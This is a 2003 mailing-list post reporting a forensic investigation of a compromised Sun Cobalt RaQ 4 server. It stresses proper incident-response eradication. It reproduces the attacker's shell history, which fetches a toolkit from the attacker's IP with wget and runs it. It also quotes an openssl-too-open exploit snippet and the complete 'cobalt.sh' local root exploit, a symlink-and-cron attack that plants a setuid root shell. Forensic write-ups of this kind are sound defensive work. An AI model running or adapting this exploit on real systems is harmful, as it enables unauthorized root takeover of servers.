[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] Results of Forensics Examination of Compromised RaQ 4

Subject: [cobalt-security] Results of Forensics Examination of Compromised RaQ 4
From: Charles Smith <charles.smith@xxxxxxx>
Date: Fri, 24 Jan 2003 09:08:06 -0500
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

Recently my vulnerability assessment team was asked to assist in determining the root cause of a compromise of a customer's RaQ 4 that was alleged to be totally patched. Upon investigation, a summary of which appears below, it was determined the appliance had actually been compromised prior to being properly patched and had not been thoroughly eradicated after detection of the compromise thus negating any subsequent patching effort.

I would like to share the results of this effort as they provide an excellent learning vehicle. The key point to come away from concerning this effort is that adherence to a proper incident response methodology is critical to successful recovery from these types of events. However, failure to effectively/adequately perform any step in that process, in this case inadequate eradication, will most certainly result in a failed recovery effort, no matter how well written the incident response plan is.

_____________________________________________________________________________________________________________________________________________________

Forensic evidence indicates that the break in occurred between January 15 at 03:02 and 11:04 server local time. This is evidenced by the httpd error log entries below and the file time stamps on the files located in /var/tmp on the compromised host. The initial entry in the /var/log/httpd/error log file is most likely a scanner programed to locate vulnerable machines.

[Wed Jan 15 03:02:37 2003] [error] mod_ssl: SSL handshake failed (server www.xxxxxxx.net:443, client xxx.xxx.xx.xx) (OpenSSL library error follows) [Wed Jan 15 03:02:37 2003] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different

Listing of files in /var/tmp: (Note the User ID 15 -- httpd - of the cobalt.sh file.)

-rw-rw-rw-    1 root     root        40960 Jan 13 17:53 1 -rwxr-xr-x    1 1001     1001         2164 Jan 13 17:39 auto1.sh -rwxr-xr-x    1 1001     1001         2377 Jan 13 17:45 auto.sh -rwxr-xr-x    1 1001     1001        13698 Jan 13 13:10 clear -rw-r--r--    1 15       root         2915 Jan 8 14:42 cobalt.sh -rw-r--r--    1 root     root          610 Jan 15 19:14 diagnostic.dump -rw-rw-rw-    1 root     root          151 Jan 15 05:04 dns -rw-rw-rw-    1 root     root          170 Jan 15 05:04 id -rw-rw-rw-    1 root     root         1256 Jan 15 05:04 index.html -rw-rw-rw-    1 root     root          216 Jan 15 05:04 uname -rwxr-xr-x    1 1001     1001        13760 Jan 13 13:11 ver

Examination of root's .bash_history file reveals that the following command sequence was issued after the compromise on or about January 15 at 11:04:00

id wget xxx.xxx.xx.xx/1 mv 1 /tmp cd tmp ls -l tar xf 1 ./ver sh auto.sh ./ver ./clear

The above command sequence revealed that xxx.xxx.xx.xx is the attacker's IP address. This is confirmed by the /var/log/httpd/error entries stated above. Further investigation reveals that a portion of the /var/log/httpd/adm_error log was eliminated, thereby obscuring entries form Jan 15 at about 03:00 hours to 11:00 hours. Suspect log entries are below:

[Wed Jan 15 03:00:00 2003] [error] OpenSSL: error:1407609C:SSL routines:SSL23_GET_CLIENT_HELLO:http request [Hint: speaking HTTP to HTTPS port!?] [Wed Jan 15 16:04:04 2003] [error] mod_ssl: Cannot open SSLSessionCache DBM file `/var/log/httpd/adm_ssl_scache' for writing (store) (System error follows)

Following the examination of the log files, the investigator issued a standard find command to locate files that had been modified within the past 8 days (since the 15th at 03:00 hours). (Command used: "find / -atime +8 -print") This revealed that several patches were installed after the compromise had occurred. It also revealed that no eradication had been done on the hackers tools (located in /tmp).

Accordingly, evidence indicates that no eradication was done, and patches were installed after the compromise had occurred. This significantly hampered further evidence collection efforts by the investigator. However we are able to determine that the likely method of entry was through the apach/mod_ssl/openssl application combination. Without further evidence, specifically an exploit, this investigation can not conclusively identify the method of entry.

It should be noted that the entries in the /var/log/httpd/error log file do match a published exploits (openssl-too-open) pattern of execution. The log entries indicate that the openssl connection ID has been altered from the beginning of the ssl session. This could be accomplished through the following source code in the openssl-too-open exploit:

          /* overwrite the connection id with random bytes, causing the            server to abort the connection */         for (i = 0; i < ssl->conn_id_length; i++) {                 ssl->conn_id[i] = (unsigned char) (rand() >> 24);         }         send_client_finished(ssl);

Investigation concludes that while absolute determination of method of entry is not possible, evidence does point to an openssl exploit as the method of entry. Attempted use of the said exploit against laboratory RaQ 4 hosts was unsuccessful in duplicating results (i.e. a compromised host).

It should also be noted that since the patches were applied to the RaQ 4 in question after the compromise occurred, it is possible that another, older, exploit could have been the method of entry. However, no evidence to support this has been found.

Once the attacker had compromised the host a standard exploit (for which a patch exists) was used to elevate privilege from the httpd user ID (as is evidenced by the ownership of the "cobalt.sh" file in /var/tmp) to the root user ID. The "cobalt.sh" file is included below.

#!/bin/sh # # Cobalt Linux 6.0 Local Root Exploit # # Effects: <= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;) # Quick Fix: su - root -c "chmod 755 /usr/lib/authenticate" # # Problem Source Code: # fd = open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666); # # Suggested Code: # fd = mkstemp("/tmp/gmon.out-XXXXXX"); # # Still need help Cobalt developers? Ok: # man 3 tmpfile; man 2 open; echo "Thanks core" # # by Charles Stevenson <core@xxxxxxxxxx> # # Fri Jun 28 03:35:53 MDT 2002 # - initial version # Sun Jul 7 20:12:41 MDT 2002 # - added some features for robustness echo "RaQFuCK.sh by core" target="/usr/lib/authenticate" tempdir="/tmp" if [ -u /.sushi ] ; then     exec /.sushi fi printf "Checking for $target..." if [ -f "$target" ] ; then     echo "done." else     echo "NO!"     exit 1 fi printf "Checking if $target is setuid root..." if [ -u "$target" ] ; then     echo "done." else     echo "NO! Hrm... does this admin have a clue???"     exit 1 fi if [ ! -d "$tempdir/core" ]; then     printf "Creating $tempdir/core..."     if ! mkdir "$tempdir/core" 2>/dev/null ; then echo "FAILED!" ; exit 1     fi     echo "done." fi printf "Changing directory to $tempdir/core..." if ! cd "$tempdir/core" 2>/dev/null ; then     echo "FAILED!" ; exit 1 else     echo "done." fi printf "Creating cron.d symlink..." if ! ln -fs /etc/cron.d/core gmon.out 2>/dev/null; then     echo "FAILED!" ; exit 1 else     echo "done." fi printf "Changing umask..." if ! umask 000 ; then     echo "FAILED!" ; exit 1 else     echo "done." fi printf "Compiling root shell..." cat >sushi.c <<EOF #include <unistd.h> int main (int argc, char **argv, char **envp) {     setuid(0);     setgid(0);     execve("/bin/sh",argv,envp);     return -1; } EOF if ! cc sushi.c -o sushi 2>/dev/null; then     echo "FAILED!" ; exit 1 else     echo "done." fi printf "Compiling cron takeover..." cat >takeover.c <<EOF #include <stdlib.h> main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); } EOF if ! cc takeover.c -o own 2>/dev/null; then     echo "FAILED!" ; exit 1 fi echo "done." printf "Performing symlink attack..." printf "\n\n\n\n" | "$target" if [ -u /etc/cron.d/core ] ; then     echo "SYMLINK ATTACK FAILED!" && exit 1 else     echo "done." fi printf "Setting up evil cron job..." cat >croncore <<EOF */1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own"; fi EOF if ! cat croncore 2>/dev/null >/etc/cron.d/core; then     echo "FAILED!" ; exit 1 else     echo "done." fi printf "Waiting for root shell" while [ ! -u /.sushi ] ; do     sleep 1 ; printf "." done echo "done." cd / printf "Cleaning up real quick..." if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then     echo "FAILED??? Fuck it!" else     echo "done." fi echo "Spawning root shell!!! God Damn! I say GOD DAMN!!" if ! exec /.sushi -i; then     echo "Exec Failed!!! BUMMER!" ; exit 1 fi

Please contact the investigator, Mark Carey, with any further questions. His e-mail is mark.carey@xxxxxxx.

_______________________________________________________________________________________________________________________________________________________

Cheers,

Charles

Follow-Ups:
- Re: [cobalt-security] Results of Forensics Examination of Compromised RaQ 4
  - From: Jesse Throwe
- RE: [cobalt-security] Results of Forensics Examination of Compromised RaQ 4
  - From: Gavin Nelmes-Crocker

Prev by Date: Re: [cobalt-security] chown segfaults with option --from on Raq550
Next by Date: Re: [cobalt-security] Results of Forensics Examination of Compromised RaQ 4
Previous by thread: Re: [cobalt-security] chown segfaults with option --from on Raq550
Next by thread: Re: [cobalt-security] Results of Forensics Examination of Compromised RaQ 4

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index